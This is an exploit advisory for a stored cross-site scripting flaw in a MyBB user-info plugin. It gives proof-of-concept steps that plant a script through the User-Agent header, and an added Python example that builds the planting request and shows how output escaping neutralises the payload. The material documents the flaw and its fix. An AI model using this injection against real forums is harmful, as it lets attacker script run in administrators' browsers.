MyBB Extended Useradmininfo Plugin 1.2.1 - Cross-Site Scripting

EDB-ID: 31525
CVE:
Platform: PHP
Date: 2014-02-09


# Exploit Title: Extended Useradmininfo MyBB Plugin 1.2.1 - Cross-Site Scripting
# Google Dork: N/A
# Date: 09.02.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage: http://forum.mybboard.de/user-9022.html
# Software Link: http://mods.mybb.com/view/extended-useradmininfo
# Version: 1.2.1
# Tested on: PHP

Description:
This plugin shows extended information about a user, such as last IP address,
User-Agent, browser and operating system. The information is shown in the
user profile and is visible only to people who are able to see the admin
options on user profiles.

Proof of Concept
1. Create a user account.
2. Set your browser's (or HTTP client's) User-Agent header to
   "Mozilla<script>alert(1)</script>".
3. Log in and then log out, so the plugin records the crafted User-Agent for
   your account.

* The stored User-Agent is written into the profile page without output
  encoding, so the script executes whenever an administrator (or anyone else
  permitted to see the admin options on profiles) views your profile.
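The following is an added example, not code from the advisory or from the plugin: it shows the request that plants the payload from step 2 and simulates the profile row being rendered with and without output encoding. The login URL, form fields, the row's HTML shape and the function names are assumptions; the plugin itself is PHP, where the equivalent of html.escape is MyBB's htmlspecialchars_uni.

```python
"""Added example (not the plugin's own code): stored XSS through the
User-Agent header, and the output-encoding fix that neutralises it.
Assumed: login path, form fields, table-row markup and function names."""
import html
import urllib.request

# Constructed PoC value taken from step 2 of the advisory.
POC_USER_AGENT = "Mozilla<script>alert(1)</script>"


def build_login_request(base_url: str, user_agent: str) -> urllib.request.Request:
    """Build (but do not send) the login request that plants the payload.
    The plugin records the User-Agent header at login, so that header is the
    only attacker-controlled input. base_url and the path are assumptions."""
    return urllib.request.Request(
        f"{base_url}/member.php?action=login",
        data=b"username=attacker&password=secret",
        headers={"User-Agent": user_agent},
        method="POST",
    )


def render_useragent_row(stored_ua: str, escape_output: bool) -> str:
    """Render the 'User Agent' row of the profile's admin-info box.
    escape_output=False mirrors the vulnerable behaviour (raw echo of the
    stored value); escape_output=True mirrors the fix (HTML-encode on output,
    what htmlspecialchars_uni does on the PHP side)."""
    value = html.escape(stored_ua, quote=True) if escape_output else stored_ua
    return f"<tr><td>User Agent</td><td>{value}</td></tr>"


def is_script_injected(rendered_html: str) -> bool:
    """Crude check, used here only to make the two outcomes visible:
    does a live <script> tag survive into the rendered page?"""
    return "<script>" in rendered_html.lower()


if __name__ == "__main__":
    req = build_login_request("http://forum.example", POC_USER_AGENT)
    # urllib normalises header names, hence "User-agent" on lookup.
    print("planted header:", req.get_header("User-agent"))
    for escape in (False, True):
        row = render_useragent_row(POC_USER_AGENT, escape)
        label = "escaped" if escape else "raw    "
        print(label, "->", row, "| script injected:", is_script_injected(row))
```

Run it and compare the two rows: the raw rendering carries the payload through unchanged, while the escaped one shows the same string as literal text, which is also what you should see on the real profile page once the fix is applied.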


Solution:
Replace the content of "inc/plugins/extendeduseradmininfos.php" with the fix
published at http://pastebin.com/ncQCvwdq. After applying it, repeat the steps
above: the profile should now display the crafted User-Agent as literal text
instead of executing it.